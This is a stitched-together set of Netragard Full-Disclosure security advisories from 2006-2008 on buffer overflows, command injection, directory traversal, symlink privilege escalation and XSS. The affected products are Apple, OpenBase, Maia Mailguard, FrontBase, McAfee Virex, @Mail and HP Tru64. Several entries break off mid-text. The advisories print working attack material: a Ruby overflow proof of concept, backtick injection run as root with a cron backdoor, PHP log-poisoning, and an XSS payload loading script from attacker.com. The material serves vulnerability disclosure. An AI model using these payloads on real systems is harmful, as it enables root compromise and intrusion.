[Full-disclosure] [NETRAGARD SECURITY ADVISORY][Apple Core Image Fun House = 2.0 OS X -- Arbitrary Code Execution][NETRAGARD-20080711]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
*** NETRAGARD ADVISORY ***
http://www.netragard.com
We make IT Safe
[Advisory Summary]
- --
Advisory Author : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070628
Product Name: Core Image Fun House
Product Version : = 2.0 OS X
Vendor Name : http://www.apple.com
Type of Vulnerability : Buffer Overflow
Effort (1-10 where 1 == easy) : 5
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : N/A
Discovery Date : 07/10/2007
[POSTING NOTICE]
- --
If you intend to post this advisory on your web-site you must provide
a clickable link back to http://www.netragard.com as the contents of
this advisory may be updated without notice.
[Product Description]
- --
From creating new solutions for print, photography, scientific
visualization, and film post-production to enhancing your application's
user interface with innovative and effortless visual effects, Core Image
performs the heavy lifting that enables the next generation of imaging
applications.
- -- http://developer.apple.com/macosx/coreimage.html --
[Technical Summary]
- --
It is possible to trigger an exploitable buffer overflow condition
by creating a specially crafted .funhouse file.
[Technical Details]
- --
The Funhouse application does not properly parse XML data.
Specifically it is possible to create a specially crafted .funhouse
file that will trigger and exploit a buffer overflow condition. The
code responsible for the condition is as follows:
// render origin handles using AppKit directly
- - (CIImage *)drawPoints:(CIImage *)im
{
...
~NSString *str, *str2, *localizedParameter;
...
~else if ([type isEqualToString:@image])
~{
~// image effect stack element
~// show an image origin (in its center)
~CGRect r = [[es imageAtIndex:i] extent];
~NSPoint offset = [es offsetAtIndex:i];
~pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
~pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
~str = [[es filenameAtIndex:i] stringByAppendingString:@
center];
~[self drawPoint:pt label:str intoContext:cg];
~}
}
The following code is called by the code referenced above:
/*
~Drawing
*/
// draw an onscreen handle for an image origin, text origin, or filter point
// the handle is a center symbol - a circle with crosshairs through it.
// the handle is labelled with the string str.
// all items are shadowed
- - (void)drawPoint:(NSPoint)pt label:(NSString *)str
intoContext:(CGContextRef)cg
{
...
~char cstr[256];
...
~if (!movingNow)
~{
~[str getCString:cstr]; -- Vulnerability Exists Here
[Fix]
- --
To fix the issue the [str getCString:cstr]; needs to be replaced with
[str getCString:cstr maxLength:254]; to prevent overflows.
- - [str getCString:cstr];
+ [str getCString:cstr maxLength:254];
[Proof Of Concept]
- --
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. [EMAIL PROTECTED]
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' repeats 101 times, DCBA center
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
#CFPropertyListCreateFromXMLData(): plist parse failed;
#the data is notproper UTF-8. The file name for this data
#could be:
$
#/Users/test/Desktop/SuperTastey.funhouse/file.xml
#The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8
len = 300
fname = SuperTastey
retaddr = 0x0d0d0d0d # There are lots of filtered chars!
if File.exist?(fname + .funhouse/file.xml)
File.unlink(fname + .funhouse/file.xml)
Dir.rmdir(fname + .funhouse)
end
Dir.mkdir(fname + .funhouse)
FUNSTUFF =
?xml version=\1.0\ encoding=\UTF-8\? +
!DOCTYPE plist PUBLIC \-//Apple Computer//DTD PLIST 1.0//EN\
\http://www.apple.com/DTDs/PropertyList-1.0.dtd\; +
plist version=\1.0\ +
dict +
keylayers/key +
array +
dict +
keyfile/key +
string +
Z * len + [retaddr].pack(V) +
/string +
keyoffsetX/key +
[Full-disclosure] [NETRAGARD-20070313 SECURITY ADVISORY] [OpenBase SQL Relational Database 10.0.5 - SYSTEM/root compromise]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
** Netragard, L.L.C Advisory**
Penetration Testing, Vulnerability Assessments, Web Application Security
Strategic Reconnaissance Team
http://www.netragard.com -- We make I.T. Safe.
[POSTING NOTICE]
- --
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/
For more information about Netragard visit http://www.netragard.com
[Advisory Information]
- --
Contact : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070313
Product Name: OpenBase SQL Relational Database
Product Version : = OpenBase 10.0.5 (All Platforms)
Vendor Name : OpenBase International, Ltd.
Type of Vulnerability : Remote Buffer Overflow, Command injection
Effort : Easy
[Product Description]
- --
For over a decade, the OpenBase family of products have been enabling
some of the most innovative business applications at work today. With
thousands of customers worldwide, OpenBase has become a brand that
companies can rely on.
OpenBase customers include ATT, Adobe Systems, Canon, Walt Disney,
First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image
and many other innovators worldwide.
- -- http://openbase.com/home-Aboutus.html --
[Technical Summary]
- --
Netragard's SNOsoft Research Team discovered two critical
vulnerabilities in the OpenBase SQL Relational Database that can lead to
full system compromise.
The first vulnerability discovered is a command injection vulnerability
that affects several of the default Stored Procedures. Specifically,
it is possible to execute system commands as the root user by inserting
a series of backticks into the pre-defined Stored Procedures.
The second vulnerability discovered in Buffer Overflow that causes heap
corruption. This also has the potential to lead to the execution of
arbitrary code or a Denial of Service condition.
[Technical Details]
- --
1. call AsciiBackup('\`id\`')
results in commands being run as root.
desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages
OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.
Using database 'WOMovies' on host 'localhost'
Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck
2. call GlobalLog(../../../path/to/file, \n user input goes here \n)
results in root owned files being created. Combine with above for an
easy backdoor.
openbase 1 call GlobalLog(../../../../../../etc/periodic/daily/600
, \n/usr/bin/id /tmp/file\n)
openbase 2 go
Data returned... calculating column widths
return_0
- --
Success
- --
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1 call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2 go
Data returned... calculating column widths
return_0
- --
Failure
- --
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1
3. select ... from aaa...
results in zone_free() issues referencing 0x61616161
4. call OEMLicenseInstall(`/usr/bin/id/tmp/aaax`,`/usr/bin/id/tmp/bbbx
`,`/usr/bin/id/tmp/x`,`/usr/bin/id/tmp/cdfx`)
results in commands being run as root
An exploitable vulnerability exists in OpenBase in the creation of
Stored Procedures that can be used to gain NT AUTHORITY\SYSTEM or root
level privileges. Specifically, a user can create a stored procedure
with an unusually long name which will and trigger a buffer overflow
condition that will result in heap corruption. If done properly, an
attacker may be able to execute arbitrary commands against the affected
system.
[Proof Of Concept]
- --
See Above
[Vendor Status]
- --
Vendor Notified on 03/05/07
Vendor Patched on 03/09/07
Vendor quote:
OpenBase now runs as the 'openbase' user for security reasons. I would
like to publically thank Kevin Finisterre for his input.
[Disclaimer]
- http://www.netragard.com--
Netragard, L.L.C.
[Full-disclosure] [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary Code Execution][NETRAGARD-20070628]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
*** NETRAGARD ADVISORY
http://www.netragard.com
We make IT Safe
[Advisory Summary]
- ---
Advisory Author : Adriel T. Desautels
Advisory ID : NETRAGARD-20070628
Product Name: Maia Mailguard
Product Version : = 1.0.2 FreeBSD and Possibly More
Vendor Name : http://www.miamailguard.com
Type of Vulnerability : Directory Traversal / File Read
Effort (1-10 where 1 == easy) : 2
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : N/A
Discovery Date : 06/10/2007
[POSTING NOTICE]
- ---
If you intend to post this advisory on your web-site you must provide
a clickable link back to http://www.netragard.com as the contents of
this advisory may be updated without notice.
[Product Description]
- ---
Maia Mailguard is a web-based interface and management system based on
the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl
and PHP, Maia Mailguard gives end-users control over how their mail is
processed by virus scanners and spam filters, while giving mail
administrators the power to configure site-wide defaults and limits.
- -- http://www.miamailguard.com --
[Technical Summary]
- ---
A Directory Traversal vulnerability exists in the Maia Mailguard Web
Application that enables an attacker to execute arbitrary commands on
the affected system.
[Technical Details]
- ---
Improper input validation on the lang variable in Maia Mailguard web
application has resulted in a Directory Traversal vulnerability that
can be used to execute arbitrary commands on he affected system, or, to
read arbitrary files on the affected system.
[Proof Of Concept]
- ---
1-) An attacker can inject code into the httpd-error.log file by
connecting to port 80 on the affected system and issuing a get
CODE HERE command. See example below:
the-wretched:~ simon$ telnet maiatest.snosoft.com 80
Trying 10.0.0.128...
Connected to maiatest.snosoft.com.
Escape character is '^]'.
get ltpre?php system('ls -laf /var/log');?
HTTP/1.1 400 Bad Request
Date: Wed, 20 Jun 2007 21:31:58 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28
OpenSSL/0.9.7e-p1
Connection: close
Content-Type: text/html; charset=iso-8859-1
2-) Once the attacker has injected his code into the log file, the code
can be executed by forcing the web application to read the log file.
When the log file is read, the code is executed. Below is an example
of code execution:
the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/login.php?lang=
../../../../../../../../../../../../../var/log/httpd-error.log%00.txt
[Vendor Status]
- ---
Vendor has been notified and was quick to resolve the issue.
[Vendor Comments]
- ---
The only addition that I had was that it seems to only affect systems
like freebsd... It would be nice to nail that down. It suspect the
root security issue is really with the php and file-system
interaction... my patch just simply works around and blocks the root
problem. From my developer point of view, I'm asking for one file
and the file-system is giving us something else. That's a serious
risk. If we could at least express that concern, I think that would
be prudent.
Chicken and egg problem, I was kinda waiting on you to post our own
ticket, but I can add a comment afterwards. OK.
Here's our ticket which also references the changeset:
http://www.maiamailguard.org/maia/ticket/479
A unified patch may be retrieved from: http://www.maiamailguard.org/
maia/changeset/1184?format=diffnew=1184
David Morton
[Disclaimer]
- --http://www.netragard.com-
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.
a href=http://www.netragard.com
http://www.netragard.com
/a
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (Darwin)
iD8DBQFGjQvXQwbn1P9Iaa0RAtkkAKCLZzwMLPPejeXmpXoYCMqvGdaF4QCgqALm
4LRwop09S8YjiKDwTSpvgXY=
=TeIH
-END PGP
[Full-disclosure] [NETRAGARD-20070316 SECURITY ADVISORY][FrontBase Database = 4.2.7 ALL PLATFORMS][REMOTE BUFFER OVERFLOW CONDITION][LEVEL: EASY][RISK:MEDIUM]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Netragard, L.L.C Advisory* *** Strategic Reconnaissance Team http://www.netragard.com -- We make I.T. Safe. [Advisory Information] - --- Contact : Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID : NETRAGARD-20070316 Product Name: FrontBase Relational Database Server Product Version : = FrontBase 4.2.7 (All Platforms) Vendor Name : FrontBase, Inc. Type of Vulnerability : Remote Buffer Overflow Effort : Easy [POSTING NOTICE] - --- If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. a href=http://www.netragard.com/html/recent_research.html Netragard Research /a [About Netragard] - --- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products, Security Appliances, Network Appliances, and Web Applications commonly found in businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Product Description] - --- FrontBase is the only enterprise level relational database server that was created in the Internet age, by Internet professionals specifically to meet and exceed the demands of today's new economy. - -- http://www.frontbase.com/ -- [Technical Summary] - --- Any user with access to the FrontBase SQL command prompt and sufficient privileges to create a stored procedure may be able to exploit a buffer overflow condition in the parsing of 'CREATE PROCEDURE' SQL requests. Successful exploitation may result in arbitrary code execution or a denial of service condition. [Technical Details] - --- An exploitable vulnerability exists in FrontBase that can be used to gain NT AUTHORITY\SYSTEM or root privileges on an affected system. This vulnerability exists within the creation Stored Procedures. If a user creates a procedure with a very long name FrontBase will crash due to memory corruption. Memory can be corrupted in such a way that an attacker can run arbitrary code. The following example buffer can be used to trigger the vulnerability: create procedure aaa aaa() begin end; Upon parsing the final ';' in the statement the database will trigger an exception and crash. Example: FrontBase currently runs on the following variety of platforms: Mac OS X Server 10.x Mac OS X Server 1.2 RedHat SuSE YellowDog Linux Debian Linux Mandrake Linux FreeBSD Solaris HP-UX Windows Windows NT Windows 2000 Below are a few examples of debugger output which highlight the bug. On the windows Platform one of two things are possible. First we can overwrite the SEH Handler with an address of our choosing. Because we also overwrite EDI when we smash the SEH we will trigger an exception. This enables us to inject a malicious exception handler. EAX ECX EDX 01863214 EBX 01863484 ESP 0196F344 EBP 018666D8 ESI 01863E0C EDI 41414141 EIP 0043BE6D FrontBas.0043BE6D SEH chain of thread 0D3C AddressSE handler 0196FFA4 04030201 The other option on windows is to simply overwrite the EIP address. This method may not be as straight forward due to limited register control. It may be possible to jump into ESP and
[Full-disclosure] [NETRAGARD-20070220 SECURITY ADVISORY] [McAfee VirusScan for Mac (Virex) Local root exploit and Scan Bypass]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Netragard, L.L.C Advisory* *** Strategic Reconnaissance Team http://www.netragard.com -- We make I.T. Safe. [POSTING NOTICE] - --- If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. a href=http://www.netragard.com/html/recent_research.html Netragard Research /a [About Netragard] - --- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products and Web Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Advisory Information] - --- Contact : Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID : NETRAGARD-20070220 Product Name: McAfee VirusScan for Mac (Virex) Product Version : = Virex 7.7 Vendor Name : McAfee Type of Vulnerability : Local root exploit and Scan Bypass Effort : Easy [Product Description] - --- Guard your Macintosh systems and users against all types of viruses and malicious code, even new unknown threats with McAfee VirusScan for Mac. - -- http://www.mcafee.com -- [Technical Summary] - --- McAfee Virex contains an exploitable feature that enables users to define what files should be excluded for scanning. This feature relies on a configuration file with insecure privileges and is located in /Library/Application Support. Any user on the system can modify or delete the configuration file thus affecting what Virex will scan. A simple example of such a modification would be to echo into the file which in turn would cause Virex to ignore all files on the entire system. [Technical Details] - --- An exploitable vulnerability exists in McAfee Virex that can be used to gain root privileges on an affected system. This vulnerability exists within the feature that enables users to define files for scan exclusion. The configuration file used to store scan exclusion files has insecure permissions of rw-rw-rw and as such can be modified or removed by any user. Upon system boot the VShieldCheck process that runs with root privileges verifies the existence of the VShieldExecute.txt file located at: /Library/Application/Sypport/Virex/VShieldExecute.txt If VShieldCheck does not find the file at boot then it recreates the file with the rw-rw-rw permissions. The exact command that it uses to set those permissions is shown below: SNOsoft-virexuser$ strings /usr/local/vscanx/VShieldCheck | grep chmod /bin/chmod a+rw '%s' /dev/null 21 The VShieldCheck process does not check for symlinks prior to creating the VShieldExecute.txt file. If an attacker creates a symlinks to: /var/cron/tabs/root from /Library/Application Support/Virex/VShieldExclude.txt then the file /var/cron/tabs/root will be created with writable permissions by the VShieldCheck process at the next system boot. Once the file is created the attacker can insert arbitrary commands into the newly created cron file that will be executed with root privileges. Example: SNOsoft-virexuser$ crontab -l crontab: no crontab for virexuser SNOsoft-virexuser$ Desktop/pwn_virex.pl Usage: Desktop/pwn_virex.pl target Targets: 0 . Virex 7.7.dmg SNOsoft-virexuser$ Desktop/pwn_virex.pl 0 *** Target: Virex 7.7.dmg /Library/Application Support/Virex/VShieldExclude.txt wait for a reboot a cron run... SNOsoft-virexuser$ crontab -l * * * * * /usr/bin/perl /Users/Shared/droptab.pl SNOsoft-virexuser$ ls -al /Library/Application\ Support/Virex/ total 88 drwxrwxr-x5 root admin170 Oct 15 22:08 . drwxrwxr-x 10 root admin340 Nov 3 11:11 .. lrwxr-xr-x1 virusbar admin 19 Oct 15 22:08 VShieldExclude.txt - - /var/cron/tabs/root - -rwxr-xr-x1 root wheel
[Full-disclosure] [NETRAGARD-20061220 SECURITY ADVISORY] [EMAIL PROTECTED] WebMail Cross Site Scripting Vulnerabilitity]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Netragard, L.L.C Advisory* ***
Strategic Reconnaissance Team
http://www.netragard.com -- We make I.T. Safe.
[POSTING NOTICE]
- --
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.
a href=http://www.netragard.com/html/recent_research.html
Netragard Research
/a
[About Netragard]
- --
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools. This advisory is the
product of research done by the Strategic Reconnaissance Team.
[Advisory Information]
- --
Contact : Adriel T. Desautels
Researcher : Philippe C. Caturegli
Advisory ID : NETRAGARD-20061206
Product Name: @ Mail
Product Version : 4.51
Vendor Name : Calacode
Type of Vulnerability : XSS with filter evasion technique.
Effort : Easy
- --
Netragard Security Note:
Source code obfuscation does not reduce the risk profile of any
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques.
[Product Description]
- --
@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device.
- --http://www.atmail.com--
[Technical Summary]
- --
@Mail does not properly sanitize email. While @Mail does pre-append
a DEFANGED_ tag to detected HTML tags, it does not properly detect
SCRIPT/XSS tags. This failure makes @Mail vulnerable to Cross-site
Scripting Attacks (XSS) via filter evasion.
[Technical Details]
- --
@Mail renders HTML emails by default. (Note: we did not find a way to
disable this feature.) The emails that are received are parsed by the
following code located in Global.pm which disarms basic XSS attacks.
- ---8--- SNIP Global.pm line 626 - 635 SNIP ---8---
my ( $I1I11I11I11I, $I1I111III1II );$_ =
$III1II1II1II-II1II1I11111($I1I1II1II1I11II1);if (//)
{s/(META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY)(\s|)/DEFANGED_$1$2/gi;
s/On(Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|KeyUp|
Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|Resize|Select|Submit|
Unload)/DEFANGED_On$1/gi;
}if (/[\047][^\047\s]*#x?[1-9][0-9a-f]/i) {while (
/[\047][^\047\s]*#((4[6-9]|5[0-8]|6[4-9]|[78][0-9]|9[07-9]|1[0-1][0-9]|12[0-2]))/
)
{$I1I111III1II = chr($1);s/#$1;?/$I1I111III1II/g;
}while (
/[\047][^\047\s]*#(x(2[ef]|3[0-9a]|4[0-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]))/i
)
{$I1I111III1II = chr( hex(0$1) );s/#$1;?/$I1I111III1II/gi;
- ---8--- SNIP Global.pm line 626 - 635 SNIP ---8---
The above code will replace SCRIPT with DEFANGED_SCRIPT, but the
security created by the filtering process can be defeated. This is
because most web browsers assume that non-alpha-non-digit characters
are invalid after an HTML keyword and as such they are treated as
white-space. An attacker can use this knowledge to attack @Mail users.
Example:
\s matches any white space character (space and tab, as
well as \n and \r characters). SCRIPT is defanged by the
above sanitization however SCRIPT/XSS is not.
When SCRIPT/XSS hits a web browser it is translated back into
SCRIPT and executed by the browser. the /XSS becomes whitespace
to the browser. This is a very common filter evasion technique.
The following code SCRIPT/XSS src=//attacker.com/xss.js/SCRIPT
will then be executed when rendering an email with @Mail Webmail.
Please note that the email parser will also replace http:// by a a
href=..., breaking up our XSS
[Full-disclosure] [NETRAGARD-20061109 SECURITY ADVISORY] [HP Tru64 libpthread buffer overflow][http://www.netragard.com]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Netragard, L.L.C Advisory* *** Strategic Reconnaissance Team http://www.netragard.com -- We make I.T. Safe. [Advisory Information] - -- Advisory ID : NETRAGARD-20060810 Advisory Contact: Adriel T. Desautels Credit : Undisclosed Product Name: libpthread Product Version : 5.1b Vendor Name : Hewlet Packard Type of Vulnerability : Local Root Compromise Effort : Very Difficult Operating System: Tru64 Other : Buffer Overflow [Product Description] - -- The pthread library (libpthread) provides interfaces for developing multi-threaded applications. [Technical Summary] - -- libpthread suffers from a buffer overflow vulnerability which may enable an attacker to execute arbitrary commands on the system. This vulnerability may potentially be exploited by a creating a specially crafted buffer and inserting it into the PTHREAD_CONFIG variable. [Technical Details] - -- libpthread reads in the PTHREAD_CONFIG environment variable. It may be possible to exploit libpthread on HP's tru64 by creating a specially crafted buffer. The details below do not contain the specially crafted buffer. Exploitation of this specific vulnerability is very difficult. ## # # Insert 273 A's (41) into the PTHREAD_CONFIG variable # ## OSF1 tru64 V5.1 2650 alpha bash-3.00# export PTHREAD_CONFIG=`perl -e 'print Ax 273'` bash-3.00# newaliases Segmentation fault (core dumped) ## # # Insert 274 A's (41) into the PTHREAD_CONFIG variable # ## bash-3.00# export PTHREAD_CONFIG=`perl -e 'print Ax 274'` bash-3.00# newaliases Unaligned access pid=15750 newaliases va=0x11fff00a4 pc=0x3ff805c8bf8 ra=0x3ff805c8bf8 inst=0xa4290040 Unaligned access pid=15750 newaliases va=0x11fff00bc pc=0x3ff805c8bfc ra=0x3ff805c8bf8 inst=0xa4490058 Unaligned access pid=15750 newaliases va=0x11fff008c pc=0x3ff805c8c48 ra=0x3ff805c8bf8 inst=0xa5090028 ## # # Run newaliases in gdb with the -q flag. # ## bash-3.00# gdb /tmp/newaliases -q (no debugging symbols found)...(gdb) r Starting program: /tmp/newaliases (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so ## # # Execute a back trace (bt) within gdb # ## (gdb) bt #0 0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so #1 0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so #2 0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so warning: Hit heuristic-fence-post without finding warning: enclosing function for address 0x4141414141414141 This warning occurs if you are debugging a function without any symbols (for example, in a stripped executable). In that case, you may wish to increase the size of the search with the `set heuristic-fence-post' command. Otherwise, you told GDB there was a function where there isn't one, or (more likely) you have encountered a bug in GDB. # # Execute Info Registers within gdb # (gdb) i r v0 0x226550 t0 0x11fff9b3e 4831812414 t1 0x0 0 t2 0x2 2 t3 0x0 0 t4 0x3ffc0081a004396973300224 t5 0x40 64 t6 0x7fe6 2147483622 t7 0x19 25 s0 0x4141414141414141 4702111234474983745 s1 0x11fff9c90 4831812752 s2 0x11fff9c88 4831812744 s3 0x0 0 s4 0x0 0 s5 0x11fff9ad8 4831812312 fp 0x1 1 a0 0xbf 191 a1 0x11fff9918 4831811864 a2 0x11fff96b0 4831811248 a3 0x11fff9b34 4831812404 a4 0x0 0 a5 0x11fff9b30 4831812400 t8 0x11fff9931 4831811889 t9 0x62 98 t100x49 73 t11
[Full-disclosure] *ADVISORY UPDATE* [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Netragard has updated this advisory with new information provided by the vendor. This advisory has been updated. Netragard, L.L.C Advisory* *** Strategic Reconnaissance Team http://www.netragard.com -- We make I.T. Safe. [About Netragard] - -- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products and Web Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Official URL] - - http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt [Advisory Information] - -- Contact : Adriel T. Desautels Advisory ID : NETRAGARD-20060810 Product Name: dtmail Product Version : see operating system Vendor Name : Hewlet Packard Criticality : Local Root Compromise Effort : Easy Operating System: HP Tru64 UNIX 5.1B-3 HP Tru64 UNIX 5.1B-2/PK4 HP Tru64 UNIX 5.1A PK6 HP Tru64 UNIX 4.0G PK4 HP Tru64 UNIX 4.0F PK8 HP-UX B.11.23 HP-UX B.11.11 HP-UX B.11.00 Type: Unchecked Buffer [Product Description] - -- The dtmail program is a desktop mail application. It provides an easy to use interface for viewing, filing, composing and sending electronic mail folders and mail messages. dtmail provides a GUI-based interface for manipulating electronic mail messages that can have attachments. Use the interface to compose a message, view a message or a folder containing messages, load new mail ,copy or move messages from one folder to another, delete messages, reply to messages, add and delete attachments to a message when composing, and view the contents of attachments in a message. dtmail also supplies a mail-pervasive desktop environment by providing a public Tooltalk API that other clients can use to compose and send messages. You can use dtmail as a Post Office Protocol (POP) to connect to mail servers offering POP services. If you choose this option, you can also select APOP authentication (if supported by your mail server) to encrypt your user ID and password during communications with your network mail server. [Technical Summary] - -- dtmail suffers from a buffer overflow vulnerability which could result in the execution of arbitrary code. More specifically this vulnerability is triggered when using -a flag: -a file1 ...fileN Bring up a Compose window with file1 through fileN as attachments. [Technical Details] - -- This was tested against tru64 version 5.1b using a system (a working display is required). The following gdb output demonstrates the vulnerability. gdb) r -a -a `perl -e 'print A x 9000'` Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e 'print Ax 9000'` (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. warning: Hit heuristic-fence-post without finding warning: enclosing function for address 0x4141414141414140 This warning occurs if you are debugging a function without any symbols (for example, in a stripped executable). In that case, you may wish to increase the size of the search with the `set heuristic- fence-post' command. Otherwise, you told GDB there was a function where there isn't one, or (more likely) you have encountered a
Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The advisory has been updated and fixed on the web page. Thank you for catching the errors in the posting, we appreciate it. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (Darwin) iD8DBQFFOUPBQwbn1P9Iaa0RAuHSAJ41wIJio61KcyUHW0SdeFp6qiGG8QCdE7Os 2CNkn+TL7cQqxjBmO4iXTMc= =TdM6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Netragard, L.L.C Advisory* *** Strategic Reconnaissance Team http://www.netragard.com -- We make I.T. Safe. [About Netragard] - -- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products and Web Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Official URL] - - http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt [Advisory Information] - -- Contact : Adriel T. Desautels Advisory ID : NETRAGARD-20060810 Product Name: dtmail Product Version : 5.1b Vendor Name : Hewlet Packard Criticality : Local Root Compromise Effort : Easy Operating System: Tru64 Type: Unchecked Buffer [Product Description] - -- The dtmail program is a desktop mail application. It provides an easy to use interface for viewing, filing, composing and sending electronic mail folders and mail messages. dtmail provides a GUI-based interface for manipulating electronic mail messages that can have attachments. Use the interface to compose a message, view a message or a folder containing messages, load new mail ,copy or move messages from one folder to another, delete messages, reply to messages, add and delete attachments to a message when composing, and view the contents of attachments in a message. dtmail also supplies a mail-pervasive desktop environment by providing a public Tooltalk API that other clients can use to compose and send messages. You can use dtmail as a Post Office Protocol (POP) to connect to mail servers offering POP services. If you choose this option, you can also select APOP authentication (if supported by your mail server) to encrypt your user ID and password during communications with your network mail server. [Technical Summary] - -- dtmail suffers from a buffer overflow vulnerability which could result in the execution of arbitrary code. More specifically this vulnerability is triggered when using -a flag: -a file1 ...fileN Bring up a Compose window with file1 through fileN as attachments. [Technical Details] - -- This was tested against tru64 version 5.1b using a system (a working display is required). The following gdb output demonstrates the vulnerability. gdb) r -a -a `perl -e 'print A x 9000'` Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e 'print Ax 9000'` (no debugging symbols 